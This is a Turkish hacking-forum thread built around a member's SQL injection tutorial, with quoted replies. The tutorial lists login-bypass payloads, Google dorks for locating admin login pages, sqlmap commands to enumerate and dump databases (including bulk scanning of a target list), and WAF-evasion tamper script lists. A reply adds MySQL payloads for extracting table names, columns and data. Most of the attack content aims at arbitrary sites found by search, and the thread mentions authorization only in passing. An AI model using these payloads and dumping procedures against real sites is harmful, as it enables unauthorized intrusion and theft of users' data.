• Sorgunuza [intitle:] eklerseniz, Google sonuçları başlıkta bu kelimeyi içeren belgelerle sınırlar. Örneğin, [intitle:google search] başlığında “google” kelimesi geçen ve belgenin herhangi bir yerinde (başlıkta veya başlıkta değil) “search” kelimesi geçen belgeleri döndürür. Sorgunuzdaki her kelimenin önüne [intitle:] koymak, sorgunuzun önüne [allintitle:] koymaya eşdeğerdir: [intitle:google intitle:search], [allintitle: google search] ile aynıdır.

allintitle:

• Bir sorguyu [allintitle:] ile başlatırsanız, Google sonuçları başlıkta tüm sorgu sözcüklerini içerenlerle sınırlar. Örneğin, [allintitle: google search] yalnızca başlıkta hem “google” hem de “search” bulunan belgeleri döndürür.

site:

• Sorgunuza [site:] eklerseniz, Google sonuçları belirtilen etki alanındaki web siteleriyle sınırlar. Örneğin, [help site:www.google.com], www.google.com içindeki yardımla ilgili sayfaları bulur. [help site:com], .com URL'leri içindeki yardımla ilgili sayfaları bulur. "site:" ile etki alanı arasında boşluk olamayacağını unutmayın.

stocks:

• Sorguyu [stocks:] operatörüyle başlatırsanız, Google sorgu terimlerinin geri kalanını hisse senedi sembolü olarak ele alır ve bu semboller için hisse senedi bilgilerini gösteren bir sayfaya bağlantı verir. Örneğin, [stocks: intc yhoo] Intel ve Yahoo hakkında bilgi gösterir. (Şirket adını değil, hisse senedi sembollerini yazmanız gerektiğini unutmayın.)

info:

• [info:www.google.com] Google ana sayfası hakkında bilgi gösterecektir.

ilk konumdu atladığım unuttuğum bir yer varsa söylerseniz ona göre düzenlerim tekrar

eline sağlık noktalama işaretlerine dikkat edip yazılarında font kullanıp yazılarını renklendirme yapmani söylemiştim galiba unutmuşsun bir dahaki konunda dediklerimi de eklersen iyi olur

 

[MR GLOBAL]

Hocam eline sağlık fakat SQL artık kaldımı belki unutulan sitelerde vardır.

SQL pek artık rastlanilmayan bir açık türü doğrudur ama bilmekte fayda var diye düşünüyorum

 

[Benozan5400]

Onaylandı eline sağlık noktalama işaretlerine dikkat edip yazılarında font kullanıp yazılarını renklendirme yapmani söylemiştim galiba unutmuşsun bir dahaki konunda dediklerimi de eklersen iyi olur

yorumunuz için teşekürler

 

[KritoKun]

hocam keşke bu sql injectionda keşke gidip waf bypass olayını anlatsanız hem manuel hem otomatize sqlmap ile hangi şeyler payloadı engelliyor bunun benzeri şeyler.

 

[Benozan5400]

hocam keşke bu sql injectionda keşke gidip waf bypass olayını anlatsanız hem manuel hem otomatize sqlmap ile hangi şeyler payloadı engelliyor bunun benzeri şeyler.

anlatmak isterdim fakat konu bu sefer çok uzayacaktı ve çok bir bilgim fakat ufak bir araştırmayla WAF Bypass Techniques: How to Exploit SQL Injection Vulnerabilities Like a Pro bu sitede var waf atlatma ile ilgi bilgi

 

[hacker11548]

bir şey sorabilir miyim? Neden hala web site hacking denen bir şey var ya da ilgi duyuluyor ? Bir web sitesi hacklendiği zaman ne gibi bir kazancı oluyor ? Eskiden siber savaş vardı. Gerçi o zamanlarda da indirilen siteler hep bilinmeyen kişisel sitelerdi. Hiçbir anlamı yok gibi bir şeydi. Ayda yılda 1-2 tane tutturanlar oluyodu onlar da habere çıkıyordu. Bunun dışında bugün zaten açıkların çoğu kapatılmış , bulunup hacklenen sitelerden de bir maddi ya da manevi kazanç gelmediği sürece hacklemenin mantığı nedir ki ? suç işlemekten alınan keyif mi ? merak ettiğimden soruyorum.

 

[Benozan5400]

bir şey sorabilir miyim? Neden hala web site hacking denen bir şey var ya da ilgi duyuluyor ? Bir web sitesi hacklendiği zaman ne gibi bir kazancı oluyor ? Eskiden siber savaş vardı. Gerçi o zamanlarda da indirilen siteler hep bilinmeyen kişisel sitelerdi. Hiçbir anlamı yok gibi bir şeydi. Ayda yılda 1-2 tane tutturanlar oluyodu onlar da habere çıkıyordu. Bunun dışında bugün zaten açıkların çoğu kapatılmış , bulunup hacklenen sitelerden de bir maddi ya da manevi kazanç gelmediği sürece hacklemenin mantığı nedir ki ? suç işlemekten alınan keyif mi ? merak ettiğimden soruyorum.

keyif yok aksine sistemleri denetleyerek daha güvenli hale getirmek için uğraşılıyor mesela sevmediğin bir ülkede bir sisteme sızarsan orda maddi zarar verebilirsin yada bug bounty siteleri var ordaki kurallara uyarak sıstemleri denetleyebilirsin ve gelir elde edebilirsin karar sana kalmış sadece hangi tarafta olduğunu seçerek

 

[hacker11548]

keyif yok aksine sistemleri denetleyerek daha güvenli hale getirmek için uğraşılıyor mesela sevmediğin bir ülkede bir sisteme sızarsan orda maddi zarar verebilirsin yada bug bounty siteleri var ordaki kurallara uyarak sıstemleri denetleyebilirsin ve gelir elde edebilirsin karar sana kalmış sadece hangi tarafta olduğunu seçerek

bugüne kadar 1 tane şahsi sitesinin ya da az bilinen , giripte iş yapmadım. Diyelim ki hacklediniz , yedeği vardır. 2 dk da geri yüklenir , sorunun kritikliğine göre bakılabilir. Zaten çoğu hazır site olarak yapılıyor. Bunlar da açık bırakılmadan taslaklar hazırlanıyor. Diyelim ki 1 gün sonra düzeltilmedi. O zaman kimse zaten siteye bile girmiyor , siteyi hackleyen dışında demek. yani o kadar kimsenin umrunda değil ki , hele basit bir web sitesini hackleyen hacker ne elde edicek ?
Emin olun gerçek hack işiyle uğraşanlar zeki adamlar. Gidip Sunucuları hackliyorlar, web sitelerini değil. Oyun sunucuları ya da satış yapılan sunucuları indirip şifreliyorlar. Daha sonra da para istiyorlar. Çünkü onlara erişemezsen hiçbir şey yapamazsın. Bu kadarla da kalmayıp tarih veriyorlar. Şu tarihe kadar para vermezsen kaynakları ve dosyaları paylaşacağız diyorlar. Çok müthiş bi şifreleme kullanıyorlar. Bu konuyla ilgili bir sunucu sahibi yardım istemişti. Gerçekten problemi çözmekte çok zorlanmıştık ancak halletmiştik. Bu adamların böyle iyi kazanç elde ederken gidipte onun bunun sitesini indirmekle uğraşması akla bile sığmıyor. Diyelim ki bilmem kimin .comlu sitesine hacklendiniz diye yazı koydun. İstersen her gün koy. o siteye giren 4 kişinin anamıza sövmesi dışında bir şey elde etmeyiz. Adam atma artık diye 50 TL mi atıcak napcak. bilmiyorum yani eskisi kadar güvenliksiz değil artık

 

[Benozan5400]

bugüne kadar 1 tane şahsi sitesinin ya da az bilinen , giripte iş yapmadım. Diyelim ki hacklediniz , yedeği vardır. 2 dk da geri yüklenir , sorunun kritikliğine göre bakılabilir. Zaten çoğu hazır site olarak yapılıyor. Bunlar da açık bırakılmadan taslaklar hazırlanıyor. Diyelim ki 1 gün sonra düzeltilmedi. O zaman kimse zaten siteye bile girmiyor , siteyi hackleyen dışında demek. yani o kadar kimsenin umrunda değil ki , hele basit bir web sitesini hackleyen hacker ne elde edicek ?
Emin olun gerçek hack işiyle uğraşanlar zeki adamlar. Gidip Sunucuları hackliyorlar, web sitelerini değil. Oyun sunucuları ya da satış yapılan sunucuları indirip şifreliyorlar. Daha sonra da para istiyorlar. Çünkü onlara erişemezsen hiçbir şey yapamazsın. Bu kadarla da kalmayıp tarih veriyorlar. Şu tarihe kadar para vermezsen kaynakları ve dosyaları paylaşacağız diyorlar. Çok müthiş bi şifreleme kullanıyorlar. Bu konuyla ilgili bir sunucu sahibi yardım istemişti. Gerçekten problemi çözmekte çok zorlanmıştık ancak halletmiştik. Bu adamların böyle iyi kazanç elde ederken gidipte onun bunun sitesini indirmekle uğraşması akla bile sığmıyor. Diyelim ki bilmem kimin .comlu sitesine hacklendiniz diye yazı koydun. İstersen her gün koy. o siteye giren 4 kişinin anamıza sövmesi dışında bir şey elde etmeyiz. Adam atma artık diye 50 TL mi atıcak napcak. bilmiyorum yani eskisi kadar güvenliksiz değil artık

haklısınız her konuda

 

[Zwo]

​

herkese selam öncelikle ben sancak ofansif ve savunma kulübü üyesi ozan bu günkü görevim sql injection

SQL NEDİR ?​

SQL (Structured Query language) veritabanına erişim ve yönetim için kullanılır. Veritabanlarına kayıt ekleme silme değiştirme gibi işlemler yapılır.

NEDİR SQL İNJECTİON ?​

web uygulamalarında kodlanma sırasındaki hatalar ve dikkatsizliklerdir. Basit gibi gözüksede bir sitenin sonu olabilir.

TEMEL SQL KOMUT DİZİNLERİNE BAKALIM ​

SELECT

veri tabanında seçmek için kulanılır. en basit kullanımı ise
SELECT columns_name FROM table name
SELECT * FROM table name ( * ) işareti konulunca kolonları ayırt etmeden hepsini sunar önümüze

WHERE

veri tabanında istenen veriyi belirli kriterlere göre seçmemizi sağlar. en basit kkullanımı ise :

SELECT column_name * FROM table_name WHERE column_name operator value

AND VE OR

birden fazla koşul dayalı seçim yapmayı sağlar. en basit kullanımı ise :

SELECT * FROM exampletable WHERE isim='ofansif' AND isim='defans' (iki koşulunda olması grekiyor )
SELECT * FROM exampletable WHERE isim='ofansif' OR isim='defans' (iki koşuludan biri olması grekiyor )

SQLin temeli attık şimdi de sömürelim ​

sql de ahata almak için (') tek tırnak kullanılır örnek:

SELECT * FROM isim WHERE user='kullanıcıadı' AND password='şifre'
şimdi isim adındaki tabloda kullanıcıadı ve şifre eşleşirse giriş yapılır eşleşmezse başka sayfaya yönlendirecek yada hata verecek

ozaman sürekli doğru olacak bir kod bulmamız lazım oda :
SELECT * FROM isim WHERE user = ' ' OR ' ' = ' ' AND password ' ' OR ' ' = ' '
şimdi burda kullanıcıadı boş ve şifresi boş olanları alacak fakat ' = ' koyduyğumuz için bir işlem yapacak ve bunun sonucu 1 olacak dolayısıyla tablodaki 1. kişi ile giriş yapmış olacaz
eğer bu olmaz ise diğer login için kullanılan bypassları deneyebilirirz :

LOGİN BYPASS​

''Or'='Or''
anything' OR 'x'='x
1'or'1'='1
' or 1=1 or ''='
" or 1=1 or ""="
' OR ''='
'' OR ''=''
'OR''='
hey' or 1=1–
''Or 1 = 1'
' or 1=1--
bu giriş siteleri bulmak için ise bu dorkları kullanabiliriz

GOOGLE DORKLARI​

inurl:adminPanel/index.php
inurl:adminlogin.aspx
inurl:admin/index.php
inurl:administrator.php
inurl:administrator.asp
inurl:login.asp
inurl:login.aspx
inurl:login.php
inurl:admin/index.php
inurl:adminlogin.aspx

bunları en kolay nasıl yaparız ?
tabikide sqlmap ile
sqlmap kali linnux içinde hazır gelmekte komut satırına sqlmap -h yazarak parametreleri görebiliriz
temel kullanımı ise “sqlmap -u “http://orneksite.com/veritabani” –dbs” yazarak başlayabiliriz

​

ve çıkan sonuç bunun gibi olacak

​

evet veri tabanımıza ulaştık şimdi ise tablolara bakalım

​

evet tabloları da bulduk

​

sırada colonlar var

​

colonların sonucu

​

evet her şeyi bulduk kaldı son bir işlem tüm bilgileri toplamak onun içinde

​

-dbs = Var olan veri tabanlarını talep et.
-dbms = Veri tabanı yönetim sistemini biliyorsan bu parametreyle belirt.
-D = Hangi veri tabanına erişmek istediğini belirt.
-tables = Tabloların tamamını talep et.
-T = Hangi tabloya erişmek istediğini belirt.
-columns = Tüm kolon isimlerini talep et.
-C = İstediğin kolon isimlerini belirt.
-dump = İçeriği talep et.

sürekli tek tek mi yapacaz hayır burda da ' -m ' parametresi giriyor sorgumuz ise şöyle değişiyor
sqlmap -m sqlacikli_liste.txt --dbs

böylece sqlmap temeli hallettik

fakat gerçekte WAF dediğimiz güvenlik duvarları var bunu da atlatırız nasıl mı ?
tamper scriptleri ile halledecez
Genel tamper kullanım örneği = tamper=apostrophemask,apostrophenullencode,base64encode,between,chardoubleencode,charencode,charunicodeencode,equaltolike,greatest,ifnull2ifisnull,multiplespaces,nonrecursivereplacement,percentage,randomcase,securesphere,space2comment,space2plus,space2randomblank,unionalltounion,unmagicquotes
MySQL = tamper=between,bluecoat,charencode,charunicodeencode,concat2concatws,equaltolike,greatest,halfversionedmorekeywords,ifnull2ifisnull,modsecurityversioned,modsecurityzeroversioned,multiplespaces,nonrecursivereplacement,percentage,randomcase,securesphere,space2comment,space2hash,space2morehash,space2mysqldash,space2plus,space2randomblank,unionalltounion,unmagicquotes,versionedkeywords,versionedmorekeywords,xforwardedfor
MsSQL= tamper=between,charencode,charunicodeencode,equaltolike,greatest,multiplespaces,nonrecursivereplacement,percentage,randomcase,securesphere,sp_password,space2comment,space2dash,space2mssqlblank,space2mysqldash,space2plus,space2randomblank,unionalltounion,unmagicquotes

sıradaki aracımız ise

jSQL Injection​

bu aracımız ise sqlmapın sade hali fakat aynı işleve sahip
indirmek için
GitHub - ron190/jsql-injection: jSQL Injection is a Java application for automatic SQL database injection.

kurulumu :
komut satırına : apt-get -f install jsql
herşeyi öğrendik siteleri nasıl bulacaz ?
google dork sayesinde

google dork​

inurl:

• Sorgunuza [inurl:] eklerseniz, Google sonuçları URL'de bu kelimeyi içeren belgelerle sınırlar. Örneğin, [inurl:google search] URL'lerinde "google" kelimesini geçen belgeleri ve belgenin herhangi bir yerinde (url veya değil) "search" kelimesini geçen belgeleri döndürür. Sorgunuzdaki her kelimenin önüne "inurl:" koymak, sorgunuzun önüne "allinurl:" koymaya eşdeğerdir: [inurl:google inurl:search], [allinurl: google search] ile aynıdır.

allinurl:

• Bir sorguyu [allinurl:] ile başlatırsanız, Google sonuçları URL'de tüm sorgu sözcüklerini içerenlerle sınırlar. Örneğin, [allinurl: google search] yalnızca URL'de hem "google" hem de "search" bulunan belgeleri döndürür. [allinurl:]'nin URL bileşenleri üzerinde değil, sözcükler üzerinde çalıştığını unutmayın. Özellikle noktalama işaretlerini yok sayar. Bu nedenle, [allinurl: foo/bar] sonuçları URL'de "foo" ve "bar" sözcüklerini içeren sayfayla sınırlar, ancak bunların URL içinde eğik çizgiyle ayrılmasını, bitişik olmasını veya belirli sözcük sırasında olmasını gerektirmez. Şu anda bu kısıtlamaları uygulamanın bir yolu yoktur.

intitle:

• Sorgunuza [intitle:] eklerseniz, Google sonuçları başlıkta bu kelimeyi içeren belgelerle sınırlar. Örneğin, [intitle:google search] başlığında “google” kelimesi geçen ve belgenin herhangi bir yerinde (başlıkta veya başlıkta değil) “search” kelimesi geçen belgeleri döndürür. Sorgunuzdaki her kelimenin önüne [intitle:] koymak, sorgunuzun önüne [allintitle:] koymaya eşdeğerdir: [intitle:google intitle:search], [allintitle: google search] ile aynıdır.

allintitle:

• Bir sorguyu [allintitle:] ile başlatırsanız, Google sonuçları başlıkta tüm sorgu sözcüklerini içerenlerle sınırlar. Örneğin, [allintitle: google search] yalnızca başlıkta hem “google” hem de “search” bulunan belgeleri döndürür.

site:

• Sorgunuza [site:] eklerseniz, Google sonuçları belirtilen etki alanındaki web siteleriyle sınırlar. Örneğin, [help site:www.google.com], www.google.com içindeki yardımla ilgili sayfaları bulur. [help site:com], .com URL'leri içindeki yardımla ilgili sayfaları bulur. "site:" ile etki alanı arasında boşluk olamayacağını unutmayın.

stocks:

• Sorguyu [stocks:] operatörüyle başlatırsanız, Google sorgu terimlerinin geri kalanını hisse senedi sembolü olarak ele alır ve bu semboller için hisse senedi bilgilerini gösteren bir sayfaya bağlantı verir. Örneğin, [stocks: intc yhoo] Intel ve Yahoo hakkında bilgi gösterir. (Şirket adını değil, hisse senedi sembollerini yazmanız gerektiğini unutmayın.)

info:

• [info:www.google.com] Google ana sayfası hakkında bilgi gösterecektir.

ilk konumdu atladığım unuttuğum bir yer varsa söylerseniz ona göre düzenlerim tekrar

SQL bilen biri olarak meraklı şekilde sonuna kadar okudum helal olsun güzel anlatım olmuş bende ucundan destek olayım

Table Name = (select(@z)from(select(@z:=0x00),(select(@z)from(information_schema.tables)where(table_schema!=0x696e666f726d6174696f6e5f736368656d61)and(0x00)in(@z:=concat(0x20,@z,table_name,0x3c62723e))))z)

COLUMNS = (select(@z)from(select(@z:=0x00),(select(@z)from(information_schema.columns)where(table_name=**********)and(0x00)in(@z:=concat(0x20,@z,column_name,0x3c62723e))))z)

DUMP = (select(@z)from(select(@z:=0x00),(select(@z)from(**********)where(@z)in(@z:=concat(0x20,@z,*********,0x203a3a20,0x3a,0x203a3a20,*********,0x3c62723e))))z)

payload listesi

 

[Benozan5400]

SQL bilen biri olarak meraklı şekilde sonuna kadar okudum helal olsun güzel anlatım olmuş bende ucundan destek olayım

Table Name = (select(@z)from(select(@z:=0x00),(select(@z)from(information_schema.tables)where(table_schema!=0x696e666f726d6174696f6e5f736368656d61)and(0x00)in(@z:=concat(0x20,@z,table_name,0x3c62723e))))z)

COLUMNS = (select(@z)from(select(@z:=0x00),(select(@z)from(information_schema.columns)where(table_name=**********)and(0x00)in(@z:=concat(0x20,@z,column_name,0x3c62723e))))z)

DUMP = (select(@z)from(select(@z:=0x00),(select(@z)from(**********)where(@z)in(@z:=concat(0x20,@z,*********,0x203a3a20,0x3a,0x203a3a20,*********,0x3c62723e))))z)

payload listesi

desteğiniz için teşekürler

 

[Zwo]

desteğiniz için teşekürler

Ben teşekkür ederim başarılarının devamını dilerim

 

[Zephyris]

Eline sağlık sağlam olmuş konu ha

 

[BlackPion]

Eline sağlık, Keşke bu işin artık neden yapılmadığı kısımlarına da değinseydiniz. Hashing algorithms kısımlarına -> Cryptographic hash function - Wikipedia kriptolanmış datalara -> Cryptography - Wikipedia PDO gibi konulara da değinseydiniz. -> What is PHP PDO? How to Install & Use It? | Simplilearn izinsiz/yetkisiz bir şekilde http requesti sendlediğimi zaman karşımıza ne tür status codes çıkıyor -> List of HTTP status codes - Wikipedia gibi. Eline sağlık.